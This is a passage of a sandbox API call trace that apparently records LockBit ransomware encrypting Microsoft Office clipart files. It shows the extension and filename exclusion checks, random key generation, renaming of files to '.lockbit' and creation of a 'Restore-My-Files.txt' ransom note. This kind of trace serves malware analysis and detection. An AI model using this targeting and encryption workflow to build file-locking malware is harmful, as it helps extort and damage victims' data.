lpString2=".WMF") returned -1 [0150.123] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.124] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.125] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.125] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195342.WMF") returned 1 [0150.126] lstrcmpiW (lpString1="ntldr", lpString2="J0195342.WMF") returned 1 [0150.126] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195342.WMF") returned 1 [0150.126] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195342.WMF") returned -1 [0150.126] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195342.WMF") returned -1 [0150.126] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195342.WMF") returned 1 [0150.126] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195342.WMF") returned -1 [0150.126] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.126] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195342.WMF") returned=".WMF" [0150.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.126] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.126] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.127] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.127] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195342.WMF.lockbit") returned 72 [0150.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195342.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195342.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0150.128] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.128] malloc (_Size=0x40068) returned 0x3ef0008 [0150.129] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=21328) returned 1 [0150.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0150.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0150.130] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0150.135] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195342.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195342.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.135] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.135] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.136] free (_Block=0x1fa2ed8) [0150.136] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195342.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.137] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.137] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.137] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x48be, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195428.WMF", cAlternateFileName="")) returned 1 [0150.137] lstrcmpiW (lpString1=".", lpString2="J0195428.WMF") returned -1 [0150.137] lstrcmpiW (lpString1="..", lpString2="J0195428.WMF") returned -1 [0150.137] PathFindExtensionW (pszPath="J0195428.WMF") returned=".WMF" [0150.137] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.137] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.138] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.138] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.139] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.140] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195428.WMF") returned 1 [0150.140] lstrcmpiW (lpString1="ntldr", lpString2="J0195428.WMF") returned 1 [0150.140] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195428.WMF") returned 1 [0150.140] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195428.WMF") returned -1 [0150.140] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195428.WMF") returned -1 [0150.140] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195428.WMF") returned 1 [0150.140] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195428.WMF") returned -1 [0150.140] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.140] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195428.WMF") returned=".WMF" [0150.140] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.140] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.140] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.140] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.140] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.141] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.142] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.142] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195428.WMF.lockbit") returned 72 [0150.142] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195428.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0150.143] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.143] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.143] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=18622) returned 1 [0150.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.144] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.150] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195428.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195428.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.150] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.150] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.151] free (_Block=0x1fa2ed8) [0150.151] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195428.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.151] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.151] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.152] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe60, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195772.WMF", cAlternateFileName="")) returned 1 [0150.152] lstrcmpiW (lpString1=".", lpString2="J0195772.WMF") returned -1 [0150.152] lstrcmpiW (lpString1="..", lpString2="J0195772.WMF") returned -1 [0150.152] PathFindExtensionW (pszPath="J0195772.WMF") returned=".WMF" [0150.152] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.152] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.153] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.153] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.154] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.155] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195772.WMF") returned 1 [0150.155] lstrcmpiW (lpString1="ntldr", lpString2="J0195772.WMF") returned 1 [0150.155] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195772.WMF") returned 1 [0150.155] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195772.WMF") returned -1 [0150.155] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195772.WMF") returned -1 [0150.155] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195772.WMF") returned 1 [0150.155] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195772.WMF") returned -1 [0150.155] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.155] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195772.WMF") returned=".WMF" [0150.155] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.155] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.155] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.155] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.156] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.157] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.157] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.157] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.157] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.157] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.157] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.157] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.157] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.157] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195772.WMF.lockbit") returned 72 [0150.157] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195772.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195772.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, 